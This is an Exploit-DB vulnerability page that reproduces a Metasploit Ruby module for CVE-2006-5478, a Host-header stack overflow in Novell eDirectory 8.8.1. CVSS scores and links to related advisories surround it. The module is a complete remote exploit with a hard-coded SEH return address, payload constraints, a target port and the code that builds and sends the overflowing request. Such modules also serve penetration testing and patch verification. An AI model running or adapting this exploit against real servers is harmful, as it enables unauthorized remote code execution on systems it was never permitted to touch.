Lucene search
MetasploitEDB-ID:16773HistoryMay 09, 2010 - 12:00 a.m.
Novell eDirectory NDS Server - Host Header Overflow (Metasploit)
2010-05-0900:00:00
Metasploit
www.exploit-db.com
14
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
7
Confidence
Low
##
# $Id: edirectory_host.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell eDirectory NDS Server Host Header Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.
The web interface does not validate the length of the
HTTP Host header prior to using the value of that header in an
HTTP redirect.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
['CVE', '2006-5478'],
['OSVDB', '29993'],
['BID', '20655'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll
],
'Privileged' => true,
'DisclosureDate' => 'Oct 21 2006',
'DefaultTarget' => 0))
register_options([Opt::RPORT(8028)], self.class)
end
def exploit
connect
sploit = "GET /nds HTTP/1.1" + "\r\n"
sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)
sploit << "," + rand_text_alphanumeric(719, payload_badchars)
seh = generate_seh_payload(target.ret)
sploit[705, seh.length] = seh
sploit << "\r\n\r\n"
print_status("Trying target #{target.name}...")
sock.put(sploit)
handler
disconnect
end
endRelated
saint
saint
Novell eDirectory iMonitor HTTP redirection buffer overflow
2006-10-26 00:00:00
Novell eDirectory iMonitor HTTP redirection buffer overflow
2006-10-26 00:00:00
Novell eDirectory iMonitor HTTP redirection buffer overflow
2006-10-26 00:00:00
nvd
nvd
CVE-2006-5478
2006-10-24 20:07:00
canvas
canvas
Immunity Canvas: NETMAIL
2006-10-24 20:07:00
Immunity Canvas: EDIRECTORY_HTTP
2006-10-24 16:07:00
nessus
nessus
exploitdb
exploitdb
Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (2)
2006-10-30 00:00:00
Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (1)
2006-10-21 00:00:00
Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (3)
2006-10-30 00:00:00
checkpoint_advisories
checkpoint_advisories
Novell eDirectory HTTP Server Redirection Buffer Overflow (CVE-2006-5478)
2009-10-13 00:00:00
securityvulns
securityvulns
zdi
zdi
Novell eDirectory NDS Server Host Header Buffer Overflow Vulnerability
2006-10-26 00:00:00
Novell Netmail User Authentication Buffer Overflow Vulnerability
2006-10-31 00:00:00
cve
cve
CVE-2006-5478
2006-10-24 20:07:00
metasploit
metasploit
Novell eDirectory NDS Server Host Header Overflow
2006-10-27 14:25:42
packetstorm
packetstorm
Novell eDirectory NDS Server Host Header Overflow
2009-11-26 00:00:00
cvelist
cvelist
CVE-2006-5478
2006-10-24 20:00:00
openvas
openvas
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
7
Confidence
Low
Related for EDB-ID:16773